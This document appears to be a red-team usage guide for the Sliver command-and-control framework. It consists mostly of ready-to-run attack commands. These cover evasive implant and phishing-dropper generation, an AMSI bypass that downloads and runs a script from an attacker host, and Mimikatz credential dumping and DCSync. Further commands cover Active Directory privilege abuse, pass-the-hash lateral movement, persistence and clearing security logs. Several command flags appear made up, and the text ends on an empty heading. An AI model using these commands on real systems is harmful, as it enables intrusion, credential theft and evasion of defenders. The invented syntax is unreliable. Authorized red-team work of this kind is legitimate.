Sliver Usage Guide for Advanced Red Team Operations

Offensive Operations with Sliver

Introduction to Offensive Operations with Sliver

Sliver stands as the premier Command-and-Control (C2) framework for sophisticated penetration testing and advanced red team operations. This comprehensive guide demonstrates how to leverage Sliver's robust capabilities to execute complex attacks including Active Directory exploitation, cutting-edge evasion techniques, strategic lateral movement, and targeted privilege escalation. Rather than dwelling on theory, we focus exclusively on actionable command examples and battle-tested attack scenarios that you can immediately implement during complex enterprise assessments.

Key operational advantages:

• Direct EDR evasion capabilities: Built-in obfuscation, AMSI bypass, and ETW patching

• Advanced post-exploitation: Memory manipulation, process migration, token theft, and more

• Flexible payload generation: DLL side-loading, reflective loading, shellcode injection

• Armory extensions: One-command access to Mimikatz, Rubeus, SharpHound and other attack tools

• Cross-platform versatility: Attack Windows, Linux, macOS from a single C2 framework

• Strategic assessment framework: Modular approach to mapping, exploiting, and documenting findings

Framework Comparison: Sliver vs. Other C2 Platforms

When selecting a command and control framework for advanced operations, it's essential to understand how Sliver compares to other established tools in the industry:

Framework	Key Strengths	Limitations	Best Use Cases
Sliver	Cross-platform (Go-based), in-memory evasion, flexible protocols, active development	Newer ecosystem, smaller community	Modern environments with advanced EDR, multi-OS networks
Cobalt Strike	Mature toolkit, extensive GUI, strong team collaboration	Commercial license, Windows-focused, heavily signatured	Enterprise assessments with multiple operators
Metasploit	Enormous module library, well-documented, free	Limited evasion, easily detected	Training, baseline testing, exploit validation
Empire	PowerShell focus, mature codebase	Limited recent development, PowerShell monitoring	Legacy Windows environments
Covenant	Modern .NET implementation, intuitive UI	C# only, Windows primary focus	Microsoft-centric environments
Mythic	Modular, container-based, extensible	Complex setup, steep learning curve	Advanced red teams with development capabilities

Why Choose Sliver Over Alternatives

Sliver distinguishes itself in several critical areas:

• Open-source with professional features: Unlike Cobalt Strike's commercial licensing model, Sliver offers enterprise-grade capabilities without cost barriers while maintaining active development.

• Language and platform flexibility: Where frameworks like Empire (PowerShell) and Covenant (C#) focus on specific languages, Sliver's Golang foundation provides true cross-platform support and superior performance.

• Modern defensive evasion: Sliver was designed in the era of advanced EDR solutions, incorporating evasion techniques as core features rather than afterthoughts (unlike older frameworks like Metasploit).

• Protocol diversity: Sliver supports HTTP(S), mutual TLS, DNS, named pipes, and TCP protocols with seamless switching, surpassing the more limited protocol options in many competitors.

• Developer-friendly architecture: Unlike Mythic's complex container structure, Sliver offers a cleaner implementation while still providing strong extensibility through its armory system.

For organizations requiring a blend of advanced capabilities, modern evasion techniques, and open-source accessibility, Sliver represents an optimal balance that few other frameworks achieve.

Tactical Building Blocks

Sliver offers three primary implant types you'll use throughout your engagements:

• Sessions: Interactive, real-time connections for immediate command execution (best for hands-on exploitation)

• Beacons: Asynchronous, periodic check-in implants that maximize stealth and persistence

• Canaries: Lightweight tripwire implants that alert you when defenses interact with your assets

Sliver Usage Guide for Advanced Red Team Operations

This comprehensive guide provides detailed commands, techniques, and methodologies for using the Sliver C2 framework in professional red team operations. With a strong focus on evasive payload generation and the complete attack lifecycle, this guide will help security professionals conduct thorough adversary emulations across various platforms.

Server Setup & Initial Configuration

Proper server configuration is the foundation of any successful red team operation. Sliver's flexibility allows for multiple communication channels to ensure reliable command and control.

# Install Sliver
curl https://sliver.sh/install|sudo bash

# Start the Sliver server
sliver-server

# Set up listeners
sliver > https -L 192.168.1.100 -l 443     # HTTPS listener
sliver > http -L 192.168.1.100 -l 80       # HTTP listener
sliver > dns -d example.com                # DNS listener
sliver > mtls -L 192.168.1.100 -l 8443     # Mutual TLS listener

# List active listeners
sliver > jobs

# Kill a specific listener
sliver > jobs -k [JOB-ID]

Advanced Listener Configuration

# HTTPS listener with custom certificate
sliver > https -L 192.168.1.100 -l 443 --cert /path/to/cert.pem --key /path/to/key.pem

# HTTP listener with specific website appearance
sliver > http -L 192.168.1.100 -l 80 --website https://legitimate-site.com

# DNS listener with specific resolver settings
sliver > dns -d example.com --canaries false

# MTLS listener with custom certificate authority
sliver > mtls -L 192.168.1.100 -l 8443 --ca /path/to/ca.pem

# Named pipe listener for pivoting
sliver > namedpipe -n sliver-pipe

Payload Generation

Payload generation is where Sliver truly excels, offering advanced evasion techniques and multiple output formats to bypass modern security solutions. This section covers payload generation for different platforms, encoding techniques, and evasion strategies.

Basic Windows Payloads

Windows environments are common targets in red team operations. Here's how to generate effective payloads for them:

# Generate a beacon (asynchronous, periodic check-in)
sliver > generate beacon --https 192.168.1.100:443 --jitter 30 --os windows -o initial-access.exe
# The jitter parameter adds randomization to check-in times to evade detection

# Generate a session (interactive, real-time connection)
sliver > generate --http 192.168.1.100:80 --os windows -o interactive.exe
# Sessions provide real-time interaction but can be more detectable

# Generate with evasion options
sliver > generate beacon --https 192.168.1.100:443 --evasion --evasion-etw --evasion-amsi -o evasive.exe
# These flags bypass Event Tracing for Windows and AMSI scanning

# Generate specific formats
sliver > generate --https 192.168.1.100:443 --format shared -o malicious.dll    # DLL
sliver > generate --https 192.168.1.100:443 --format service -o service.exe     # Service executable
sliver > generate --https 192.168.1.100:443 --format shellcode -o payload.bin   # Raw shellcode

Linux Payloads

Linux targets require different approaches but offer many advantages for persistence and privilege escalation:

# Generate a basic Linux ELF
sliver > generate --https 192.168.1.100:443 --os linux --arch amd64 -o linux-x64.elf

# Linux ELF with fork to background process
sliver > generate beacon --https 192.168.1.100:443 --os linux --arch amd64 --prepend-fork -o daemon-linux.elf
# The --prepend-fork option creates a background daemon process

# Shared object for Linux
sliver > generate --https 192.168.1.100:443 --os linux --arch amd64 --format shared -o backdoor.so
# Can be used with LD_PRELOAD for persistence

# Linux ARM payload (for embedded devices/Raspberry Pi)
sliver > generate --https 192.168.1.100:443 --os linux --arch arm -o linux-arm.elf
# Useful for IoT devices and embedded systems

# MacOS payload
sliver > generate --https 192.168.1.100:443 --os darwin --arch amd64 -o macos-x64.bin
# For targeting Apple macOS environments

Encoding & Encryption Techniques

Modern security solutions scan for malicious payloads. Encoding and encryption help bypass these defenses:

# Generate XOR-encoded shellcode
sliver > generate --https 192.168.1.100:443 --os windows --format shellcode --save-format xor --xor-key "SUPERSECRETKEY" -o xor-encoded.bin
# Simple XOR encoding can bypass basic signature detection

# AES encrypted shellcode (256-bit)
sliver > generate --https 192.168.1.100:443 --os windows --format shellcode --save-format aes --aes-key "32CHARKEY32CHARKEY32CHARKEY32CHAR" --aes-iv "16CHARKEY16CHAR" -o aes-encoded.bin
# Strong encryption requires a custom loader but is much harder to detect

# Base64 encoded shellcode for script inclusion
sliver > generate --https 192.168.1.100:443 --os windows --format shellcode --save-format base64 -o b64-shellcode.txt
# Useful for including in scripts or web delivery

# Generate C# source with encrypted shellcode
sliver > generate --https 192.168.1.100:443 --os windows --format shellcode --save-format csharp-compressed -o shellcode.cs
# Ready-to-compile C# loader with GZIP compression

Advanced Payload Generation

Advanced EDR Evasion Techniques

Endpoint Detection and Response (EDR) solutions have significantly improved their detection capabilities. These advanced techniques help evade sophisticated monitoring:

# Maximum evasion techniques
sliver > generate --https 192.168.1.100:443 --os windows --evasion --evasion-etw --evasion-amsi --evasion-sandbox -o max-evasion.exe
# Combines multiple evasion methods for maximum stealth

# Payload with dead code injection to mutate signature
sliver > generate --https 192.168.1.100:443 --os windows --format shellcode --evasion --dead-code -o dead-code-injected.bin
# Adds non-executing code to change the binary signature

# Target specific EDR hooks with direct syscalls
sliver > generate --https 192.168.1.100:443 --os windows --evasion-direct-syscalls -o syscall-evade.exe
# Bypasses EDR hooks in user-mode API functions by using syscalls directly

# Inject random delays to evade timing-based detection
sliver > generate --https 192.168.1.100:443 --os windows --evasion-delay --evasion -o time-delayed.exe
# Adds unpredictable execution delays to confuse behavioral analysis

# Custom stack size for memory manipulation
sliver > generate --https 192.168.1.100:443 --os windows --format shellcode --stack 1048576 -o custom-stack.bin
# Alters memory allocation patterns to evade memory scanners

# Change section names to avoid common indicators
sliver > generate --https 192.168.1.100:443 --os windows --section-name .legit -o custom-sections.exe
# Changes PE section names that security tools often inspect

# Disable built-in heuristic detections
sliver > generate --https 192.168.1.100:443 --os windows --evasion --skip-symbols -o clean-implant.exe
# Removes symbols and debug information that could trigger detection

Office Document & Web-Based Payloads

Initial access often requires phishing or web delivery. These payload formats help with those scenarios:

# Generate HTA payload
sliver > generate --https 192.168.1.100:443 --os windows --format shellcode --save-format hta -o malicious.hta
# HTML applications can execute code when opened

# Word macro payload
sliver > generate --https 192.168.1.100:443 --os windows --format shellcode --save-format vba -o word-macro.txt
# VBA code to embed in Office documents

# PowerShell payload
sliver > generate --https 192.168.1.100:443 --os windows --format shellcode --save-format powershell -o payload.ps1
# PowerShell script for fileless execution

# JavaScript payload
sliver > generate --https 192.168.1.100:443 --os windows --format shellcode --save-format javascript -o dropper.js
# JavaScript for browser-based or WSH execution

# HTML smuggling payload
sliver > generate --https 192.168.1.100:443 --os windows --format executable --save-format base64 -o payload-b64.txt
# Then create HTML with: <a href="data:application/octet-stream;base64,BASE64_CONTENT" download="update.exe">Download Update</a>
# Technique to bypass network security controls that block executable downloads

Staged Payloads

# Create a profile for consistent stager configuration
sliver > profiles new --name stager-profile --http 192.168.1.100:80 --evasion

# Set up a stage listener
sliver > stage-listener --url http://192.168.1.100:80 --profile stager-profile

# Generate a stager (much smaller than a full implant)
sliver > generate stager --lhost 192.168.1.100 --lport 80 --protocol http --os windows --arch amd64 -o small-stager.exe

# Shellcode stager for various loaders
sliver > generate stager --lhost 192.168.1.100 --lport 80 --protocol http --format shellcode --os windows --arch amd64 -o stager.bin

DLL Side-Loading Techniques

# Generate DLL with specific export functions to match legitimate DLL
sliver > generate --https 192.168.1.100:443 --format shared --os windows --exported-functions DllRegisterServer,DllGetClassObject -o legitimate-name.dll

# Use common hijackable DLL names
sliver > generate --https 192.168.1.100:443 --format shared --os windows -o version.dll

# Create a DLL specifically for COM hijacking
sliver > generate --https 192.168.1.100:443 --format shared --os windows --exported-functions DllRegisterServer,DllSurrogate -o com-hijack.dll

# Practical Side-Loading Example
# 1. Generate the malicious DLL
sliver > generate beacon --https 192.168.1.100:443 --format shared --os windows --arch amd64 --exported-functions StartW -o winscp.dll

# 2. On the target, place the DLL alongside the vulnerable application
sliver (beacon) > upload /root/payloads/winscp.dll C:\\Program Files\\WinSCP\\

# 3. Execute the legitimate application to trigger the side-load
sliver (beacon) > execute -c "\"C:\\Program Files\\WinSCP\\WinSCP.exe\""

Implant Management

# List and interact with implants
sliver > sessions                   # List active interactive sessions
sliver > beacons                    # List active beacons
sliver > use [beacon-id]            # Select a specific beacon
sliver > interact [session-id]      # Start interactive shell with a session
sliver > background                 # Return to main Sliver console
sliver > kill [implant-id]          # Terminate an implant

# Get information about current implant
sliver (beacon) > info              # Display basic info
sliver (beacon) > info -v           # Detailed information
sliver (beacon) > rename [name]     # Give beacon a friendly name

# Basic system commands
sliver (beacon) > whoami            # Current user context
sliver (beacon) > getuid            # User identifier
sliver (beacon) > getprivs          # Current privileges
sliver (beacon) > ls [path]         # List directory
sliver (beacon) > cd [path]         # Change directory
sliver (beacon) > pwd               # Print working directory
sliver (beacon) > rm [file]         # Delete file

# File operations
sliver (beacon) > upload [local] [remote]   # Upload file
sliver (beacon) > download [remote]         # Download file
sliver (beacon) > execute -c "[command]"    # Execute shell command

Process & Memory Operations

Process Management

# Process management
sliver (beacon) > ps                              # List processes
sliver (beacon) > terminate -p [pid]              # Kill process

# Process injection
sliver (beacon) > execute-shellcode -p 1234 -f /path/to/shellcode.bin
sliver (beacon) > inject -p 4567 -f /path/to/payload.bin
sliver (beacon) > inject -n notepad.exe -f /path/to/payload.bin
sliver (beacon) > spawnexec -f /path/to/payload.bin -A /path/to/legitimate.exe

# Process migration
sliver (beacon) > migrate -n explorer.exe         # Migrate to process by name
sliver (beacon) > migrate -p 1234                 # Migrate to process by PID

Advanced Process Injection

# Direct syscall injection (bypasses user-mode hooks)
sliver (beacon) > execute-assembly -e SysWhispers.dll -a "inject --process notepad.exe --syscalls"

# Process hollowing with custom entry point
sliver (beacon) > execute-assembly -e SharpBlock.dll -a "hollow -e C:\\Windows\\System32\\calc.exe -p C:\\temp\\payload.bin --entry-point 0x4550"

# PPID spoofing with injection
sliver (beacon) > execute-assembly -e SpoofParent.dll -a "explorer.exe cmd.exe"
sliver (beacon) > ps | grep cmd
sliver (beacon) > inject -p 5678 -f implant.bin

# Thread execution hijacking
sliver (beacon) > execute-assembly -e ThreadHijack.dll -a "hijack -p 1234"

Memory-Only Operations

# Execute .NET assembly from memory (no disk write)
sliver (beacon) > execute-assembly -a /path/to/Seatbelt.exe -- -group=system

# Load Mimikatz entirely in memory
sliver (beacon) > mimikatz -c sekurlsa::logonpasswords

# PowerShell memory-only techniques
sliver (beacon) > powershell-import /path/to/PowerView.ps1
sliver (beacon) > powershell Get-DomainUser -AdminCount

# Base64-encoded assembly loading (pre-encoded to avoid network traffic)
sliver (beacon) > powershell -c "[Reflection.Assembly]::Load([Convert]::FromBase64String('BASE64_ENCODED_ASSEMBLY')) | Out-Null; [Namespace.Class]::Method()"

# AMSI bypass for in-memory execution
sliver (beacon) > powershell -c "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true); IEX(New-Object Net.WebClient).DownloadString('http://192.168.1.100/PowerView.ps1')"

Credential Access & Token Manipulation

# Mimikatz integration
sliver (beacon) > mimikatz -command "sekurlsa::logonpasswords"       # Dump credentials
sliver (beacon) > mimikatz -command "privilege::debug sekurlsa::logonpasswords"
sliver (beacon) > mimikatz -command "lsadump::sam"                   # Local account hashes
sliver (beacon) > mimikatz -command "lsadump::dcsync /domain:example.local /user:krbtgt"  # DCSync

# Token manipulation
sliver (beacon) > impersonate DOMAIN\\User        # Impersonate user
sliver (beacon) > rev2self                        # Revert to original token

# Browser stored credentials
sliver (beacon) > execute-assembly -a SharpChrome.exe -m cookies
sliver (beacon) > execute-assembly -a SharpChrome.exe -m logins

# Extract Windows credentials from registry
sliver (beacon) > execute -c "reg query \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\Currentversion\\Winlogon\""

# Search for configuration files with credentials
sliver (beacon) > execute -c "findstr /si password *.xml *.ini *.txt *.config *.conf"

# Extract WiFi passwords
sliver (beacon) > execute -c "netsh wlan show profile"
sliver (beacon) > execute -c "netsh wlan show profile name=\"WIFI_NAME\" key=clear"

Active Directory Operations

Initial Enumeration

# Domain reconnaissance
sliver (beacon) > getenv USERDOMAIN               # Current domain
sliver (beacon) > getenv LOGONSERVER              # Logon server

# PowerView integration
sliver (beacon) > powershell-import /path/to/PowerView.ps1
sliver (beacon) > powershell "Get-DomainUser -AdminCount | Select-Object samaccountname"
sliver (beacon) > powershell "Get-DomainGroup | Where-Object {$_.AdminCount -eq 1}"
sliver (beacon) > powershell "Get-DomainController | Select-Object Name,IPAddress"

# BloodHound integration
sliver (beacon) > sharphound -c All -d example.local --zipfilename ad-data.zip
sliver (beacon) > download C:\\Windows\\Temp\\ad-data.zip

# Find domain controllers
sliver (beacon) > powershell -c "Get-DomainController | Select-Object Name,IPAddress"

# Enumerate domain trusts
sliver (beacon) > powershell -c "Get-DomainTrust | Select-Object SourceName,TargetName,TrustDirection,TrustType,TrustAttributes"

# Check for sensitive domain-joined systems
sliver (beacon) > powershell -c "Get-DomainComputer -Properties DnsHostName,OperatingSystem,Description | Where-Object {$_.Description -match 'SQL|admin|server'}"

DACL Abuse Attacks

Discretionary Access Control List (DACL) attacks involve manipulating permissions on AD objects to gain privilege escalation:

# Enumerate object DACLs to identify vulnerable permissions
sliver (beacon) > powershell -c "Get-DomainObjectAcl -Identity 'Domain Admins' -ResolveGUIDs | Where-Object {$_.ActiveDirectoryRights -match 'GenericAll|GenericWrite|WriteProperty|WriteDacl' -and $_.SecurityIdentifier -match $SID_OF_USER_YOU_CONTROL}"

# Find all objects with GenericWrite permissions
sliver (beacon) > powershell -c "Get-DomainObjectAcl -Identity * -ResolveGUIDs | Where-Object {$_.ActiveDirectoryRights -match 'GenericWrite' -and $_.SecurityIdentifier -match $SID_OF_USER_YOU_CONTROL}"

# Find accounts with WriteDACL on the domain
sliver (beacon) > powershell -c "Get-DomainObjectAcl -SearchBase 'DC=example,DC=local' -ResolveGUIDs | Where-Object {$_.ActiveDirectoryRights -match 'WriteDacl' -and $_.SecurityIdentifier -match $SID_OF_USER_YOU_CONTROL}"

# Abuse GenericAll on a user to reset their password
sliver (beacon) > powershell -c "Set-DomainUserPassword -Identity TargetUser -AccountPassword (ConvertTo-SecureString 'NewPassword123!' -AsPlainText -Force) -Verbose"

# Abuse GenericAll on a group to add yourself
sliver (beacon) > powershell -c "Add-DomainGroupMember -Identity 'Domain Admins' -Members 'ControlledUser' -Verbose"

# Abuse WriteDACL to grant DCSync rights
sliver (beacon) > powershell -c "Add-DomainObjectAcl -TargetIdentity 'DC=example,DC=local' -PrincipalIdentity 'ControlledUser' -Rights DCSync -Verbose"

# Execute DCSync after granting the rights
sliver (beacon) > mimikatz -c "lsadump::dcsync /domain:example.local /user:krbtgt"

Resource-Based Constrained Delegation Attacks

RBCD is a powerful attack technique for lateral movement and privilege escalation:

# Check for computers with unconstrained delegation
sliver (beacon) > powershell -c "Get-DomainComputer -Unconstrained | Select-Object -Property samaccountname,dnshostname"

# Check for computers with constrained delegation
sliver (beacon) > powershell -c "Get-DomainComputer -TrustedToAuth | Select-Object -Property samaccountname,dnshostname,msds-allowedtodelegateto"

# Create a new machine account (using PowerMad)
sliver (beacon) > powershell-import /path/to/Powermad.ps1
sliver (beacon) > powershell -c "New-MachineAccount -MachineAccount 'AttackerMachine' -Password (ConvertTo-SecureString 'MachinePassword123!' -AsPlainText -Force) -Verbose"

# Get SID of the machine account
sliver (beacon) > powershell -c "$ComputerSid = Get-DomainComputer AttackerMachine -Properties objectsid | Select-Object -ExpandProperty objectsid"

# Configure RBCD on the target
sliver (beacon) > powershell -c "Set-ADComputer -Identity TargetServer -PrincipalsAllowedToDelegateToAccount AttackerMachine$ -Verbose"

# Get TGT for the attacker machine
sliver (beacon) > rubeus asktgt /user:AttackerMachine$ /password:MachinePassword123! /domain:example.local /nowrap

# Use S4U2Self and S4U2Proxy to get a ticket for the target as Domain Admin
sliver (beacon) > rubeus s4u /ticket:doIFujCCBba[...snip...] /impersonateuser:Administrator /msdsspn:cifs/targetserver.example.local /ptt

Active Directory Certificate Services (ADCS) Attacks

ADCS is a critical infrastructure that can be exploited for privilege escalation and persistence:

# Enumerate all certificate authorities in the domain
sliver (beacon) > execute-assembly -a Certify.exe -m find /ca

# Discover vulnerable certificate templates
sliver (beacon) > execute-assembly -a Certify.exe -m find /vulnerable

# Find certificate templates with vulnerable enrollment rights
sliver (beacon) > execute-assembly -a Certify.exe -m find /enrolleeSuppliesSubject

# Find certificate templates that allow any purpose
sliver (beacon) > execute-assembly -a Certify.exe -m find /clientauth

# ESC1: Request a certificate with a template that allows enrollee-supplied subject alternative name
sliver (beacon) > execute-assembly -a Certify.exe -m request /ca:CA-SERVER\\CA-NAME /template:VulnerableTemplate /altname:Administrator

# ESC2: Request a certificate using a vulnerable template with ENROLLEE_SUPPLIES_SUBJECT
sliver (beacon) > execute-assembly -a Certify.exe -m request /ca:CA-SERVER\\CA-NAME /template:VulnerableTemplate /onbehalfof:DOMAIN\\TargetUser

# ESC3: Enroll using a template that has vulnerable access control
sliver (beacon) > execute-assembly -a Certify.exe -m request /ca:CA-SERVER\\CA-NAME /template:ControlledTemplate

# ESC8: NTLM relay to AD CS HTTP endpoints
# First, use Sliver's Inveigh to capture NTLM authentications
sliver (beacon) > inveigh -HTTP Y -HTTPS Y -HTTPSCertificate /path/to/cert.pfx -Challenge 1122334455667788

# Then relay these authentications to the ADCS web enrollment endpoint
sliver (beacon) > execute-assembly -a ntlmrelayx.exe -m -t https://ca.example.local/certsrv/certfnsh.asp -smb2support

# Convert the received certificate to a Kerberos ticket
sliver (beacon) > execute-assembly -a Rubeus.exe -m asktgt /user:Administrator /certificate:MIIRd[...snip...] /password:SecretPassword /domain:example.local /dc:dc01.example.local /ptt

# ADCS Persistence: Backdoor a certificate template
sliver (beacon) > powershell -c "$Template = Get-ADObject -Filter {name -eq 'WebServer'} -Properties * -SearchBase 'CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=example,DC=local'; $Template.pkiExtendedKeyUsage += '1.3.6.1.4.1.311.20.2.2'; Set-ADObject -Instance $Template"

Kerberos Delegation and Across-Domain Attacks

# Get domain SID for the current domain
sliver (beacon) > powershell -c "Get-DomainSID"

# Get domain SID for a trusted domain
sliver (beacon) > powershell -c "Get-DomainSID -Domain trustedomain.local"

# Extract trust keys between domains
sliver (beacon) > mimikatz -c "lsadump::trust /patch"

# Create a Golden Ticket with SID History for cross-domain attacks
sliver (beacon) > mimikatz -c "kerberos::golden /domain:child.example.local /sid:S-1-5-21-child... /sids:S-1-5-21-parent-519 /krbtgt:hash /user:Administrator /ptt"

# Enumerate users in a trusted domain
sliver (beacon) > powershell -c "Get-DomainUser -Domain trustedomain.local | Select-Object samaccountname"

# Kerberoast across a trust
sliver (beacon) > rubeus kerberoast /domain:trustedomain.local /outfile:trust-kerberoast.txt

# Enumerate foreign security principals
sliver (beacon) > powershell -c "Get-DomainForeignGroupMember"

# Enumerate external trusts
sliver (beacon) > powershell -c "Get-DomainTrust | Where-Object {$_.TrustAttributes -eq 'FILTER_SIDS'}"

# Exploit trust to access resources in the trusted domain (SID History Abuse)
sliver (beacon) > mimikatz -c "kerberos::golden /domain:domain.local /sid:S-1-5-21-domain /sids:S-1-5-21-trusted-domain-512 /user:Administrator /krbtgt:krbtgt_hash /ptt"

# Access a file share in the trusted domain using the forged ticket
sliver (beacon) > execute -c "dir \\\\server.trusteddomain.local\\share"

Lateral Movement Techniques

SMB-Based Lateral Movement

# SMB execution with PsExec
sliver (beacon) > psexec -d example.local -u Administrator -p Password123 -t ws01.example.local -c "C:\\Windows\\Temp\\beacon.exe"

# Pass-the-Hash with PsExec
sliver (beacon) > psexec -d example.local -u Administrator -H 64f12cddaa88057e06a81b54e73b949b -c "C:\\Windows\\Temp\\beacon.exe" -t ws01.example.local

# Using native Windows tools for stealth
sliver (beacon) > execute -c "copy C:\\Windows\\Temp\\beacon.exe \\\\ws01.example.local\\C$\\Windows\\Temp\\"

WMI-Based Lateral Movement

# WMI execution
sliver (beacon) > wmiexec -d example.local -u Administrator -p Password123 -c "powershell.exe -nop -w hidden -e base64payload" -t ws01.example.local

# WMI with NTLM hash
sliver (beacon) > wmiexec -d example.local -u Administrator -H 64f12cddaa88057e06a81b54e73b949b -c "C:\\Windows\\Temp\\beacon.exe" -t ws01.example.local

# Using .NET assembly for WMI execution
sliver (beacon) > execute-assembly -a SharpWMI.exe -m action=exec computername=ws01.example.local command="powershell -enc base64payload" username=DOMAIN\Administrator password=Password123

Additional Lateral Movement Techniques

# Remote scheduled task creation
sliver (beacon) > scshell -d example.local -u Administrator -p Password123 -t ws01.example.local
sliver (beacon) > scshell-create mysvc C:\\Windows\\Temp\\beacon.exe

# DCOM lateral movement
sliver (beacon) > powershell -c "$dcom = [Activator]::CreateInstance([type]::GetTypeFromProgID('MMC20.Application', 'ws01.example.local')); $dcom.Document.ActiveView.ExecuteShellCommand('cmd.exe', $null, '/c powershell.exe -nop -w hidden -e base64payload', 'SW_HIDE')"

# Remote PowerShell execution
sliver (beacon) > powershell -c "$username = 'DOMAIN\Administrator'; $password = ConvertTo-SecureString 'Password123' -AsPlainText -Force; $cred = New-Object System.Management.Automation.PSCredential($username, $password); Invoke-Command -ComputerName 'target.example.local' -Credential $cred -ScriptBlock {whoami}"

Network Operations & Pivoting

Port Scanning and Enumeration

# Enumerate network interfaces on the compromised host
sliver (beacon) > ifconfig

# Basic TCP port scan
sliver (beacon) > portscan 192.168.1.0/24 -p 22,80,443,445,3389,5985

# Network configuration and connections
sliver (beacon) > netstat
sliver (beacon) > arp

SOCKS Proxy and Tunneling

# SOCKS proxy setup
sliver (beacon) > socks5 start                    # Start SOCKS5 proxy with default settings
sliver (beacon) > socks5 start --bind 127.0.0.1:1080

# List and manage proxies
sliver > socks5
sliver > socks5 stop --id [PROXY-ID]

# Port forwarding
sliver (beacon) > portfwd add --remote-host 10.0.0.100 --remote-port 445 --local-port 8445
sliver (beacon) > portfwd list
sliver (beacon) > portfwd remove --id [FORWARD-ID]

# Establish encrypted tunnels
sliver (beacon) > tunnel add --destination 10.10.10.50:1433 --listen 0.0.0.0:11433
sliver (beacon) > tunnel add --destination 127.0.0.1:3389 --listen 0.0.0.0:13389
sliver (beacon) > tunnel list
sliver (beacon) > tunnel close --id [TUNNEL-ID]

P2P Networking

# Generate P2P implant
sliver > generate beacon --http 192.168.1.100:443 --tcp-pivot --format exe -o p2p-beacon.exe

# Connect implants in a peer-to-peer mesh
sliver (beacon) > p2p connect --address 10.0.0.5:1234 

# List peer connections
sliver (beacon) > p2p list

# Forward traffic through the P2P network
sliver (beacon) > portfwd add --remote-host 192.168.5.10 --remote-port 3389 --local-port 3389

Privilege Escalation Techniques

Windows Privilege Escalation

# Run comprehensive privilege escalation check
sliver (beacon) > armory run win-priv-check

# Check for vulnerable services
sliver (beacon) > execute-assembly -a SharpUp.exe -m audit

# Unquoted service path check
sliver (beacon) > powershell -c "Get-WmiObject -class Win32_Service | Where-Object {$_.PathName -notmatch '\"' -and $_.PathName -match ' '} | Select-Object Name, PathName"

# Always Install Elevated check
sliver (beacon) > reg query HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer /v AlwaysInstallElevated
sliver (beacon) > reg query HKCU\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer /v AlwaysInstallElevated

# Check token privileges
sliver (beacon) > getprivs

# Juicy Potato (for Windows Server 2016 and older with SeImpersonate)
sliver (beacon) > getprivs
sliver (beacon) > upload /path/to/JuicyPotato.exe C:\\temp\\
sliver (beacon) > execute -c "C:\\temp\\JuicyPotato.exe -l 1337 -p C:\\Windows\\System32\\cmd.exe -a \"/c C:\\temp\\beacon.exe\" -t *"

# PrintSpoofer (for newer Windows servers with SeImpersonate)
sliver (beacon) > upload /path/to/PrintSpoofer.exe C:\\temp\\
sliver (beacon) > execute -c "C:\\temp\\PrintSpoofer.exe -c \"C:\\temp\\beacon.exe\""

Linux Privilege Escalation

# Basic system information
sliver (beacon) > execute -c "uname -a"
sliver (beacon) > execute -c "cat /etc/issue"

# Check kernel exploits
sliver (beacon) > execute -c "cd /tmp && wget http://192.168.1.100/linux-exploit-suggester.sh && chmod +x linux-exploit-suggester.sh && ./linux-exploit-suggester.sh"

# Check sudo permissions
sliver (beacon) > execute -c "sudo -l"

# Search for SUID binaries
sliver (beacon) > execute -c "find / -perm -u=s -type f 2>/dev/null"

# Check cron jobs
sliver (beacon) > execute -c "ls -la /etc/cron*"

Persistence

Windows Persistence

# Registry persistence
sliver (beacon) > execute -c "reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /v UpdateHelper /t REG_SZ /d C:\\Windows\\Temp\\beacon.exe"

# Service persistence
sliver (beacon) > execute -c "sc create PersistentService binPath= \"C:\\Windows\\Temp\\beacon.exe\" start= auto"
sliver (beacon) > execute -c "sc description PersistentService \"Windows Update Helper\""

# Scheduled task
sliver (beacon) > execute -c "schtasks /create /sc minute /mo 5 /tn \"Windows Update Helper\" /tr C:\\Windows\\Temp\\beacon.exe /ru SYSTEM"

# WMI persistence
sliver (beacon) > powershell -c "$A = New-Object -ComObject WbemScripting.SWbemLocator; $B = $A.ConnectServer('127.0.0.1', 'root\\subscription'); $C = $B.Get('CommandLineEventConsumer'); $D = $C.SpawnInstance_(); $D.Name = 'Updater'; $D.CommandLineTemplate = 'C:\\Windows\\Temp\\beacon.exe'; $D.Put_(); $E = $B.Get('__IntervalTimerInstruction'); $F = $E.SpawnInstance_(); $F.Name = 'Updater'; $F.IntervalBetweenEvents = 3600; $F.Put_(); $G = $B.Get('__FilterToConsumerBinding'); $H = $G.SpawnInstance_(); $H.Filter = $F; $H.Consumer = $D; $H.Put_()"

Domain Persistence

# Create a domain account
sliver (beacon) > powershell -c "Import-Module ActiveDirectory; New-ADUser -Name 'ITSupport' -AccountPassword (ConvertTo-SecureString 'SecureP@ssw0rd!' -AsPlainText -Force) -Enabled $true"
sliver (beacon) > powershell -c "Add-ADGroupMember -Identity 'Domain Admins' -Members 'ITSupport'"

# Add SID History to an account
sliver (beacon) > mimikatz -c "misc::addsid target_user domain_admin_sid"

# Create a Golden Ticket for long-term persistence
sliver (beacon) > mimikatz -c "lsadump::dcsync /domain:example.local /user:krbtgt"
sliver (beacon) > mimikatz -c "kerberos::golden /domain:example.local /sid:S-1-5-21-... /krbtgt:hash /user:ghost /ptt"

External Tools Integration

# Armory management
sliver > armory list                              # List available extensions
sliver > armory install all                       # Install all extensions
sliver > armory install mimikatz                  # Install specific extension
sliver > armory update                            # Update extensions

# Common tool execution
sliver (beacon) > seatbelt -group=system          # System information
sliver (beacon) > sharphound -c All -d example.local
sliver (beacon) > rubeus asktgt /user:Administrator /domain:example.local /password:Password123
sliver (beacon) > mimikatz -c "sekurlsa::logonpasswords"
sliver (beacon) > inveigh -DNS Y -NBNS Y -HTTP Y -Proxy Y

OPSEC Considerations & Cleanup

# Remove temporary files
sliver (beacon) > rm C:\\Windows\\Temp\\beacon.exe

# Clear event logs
sliver (beacon) > powershell -c "Clear-EventLog -LogName Security"

# Kill specific processes
sliver (beacon) > terminate -p 1234

# Remove port forwards when done
sliver (beacon) > portfwd remove --id [FORWARD-ID]

# Stop and remove SOCKS proxies
sliver > socks5 stop --id [PROXY-ID]

# Test payload against security solutions before deployment
sliver > watchtower scan -f /path/to/payload.exe --vendor microsoft,crowdstrike,sentinelone

Advanced Attack Techniques

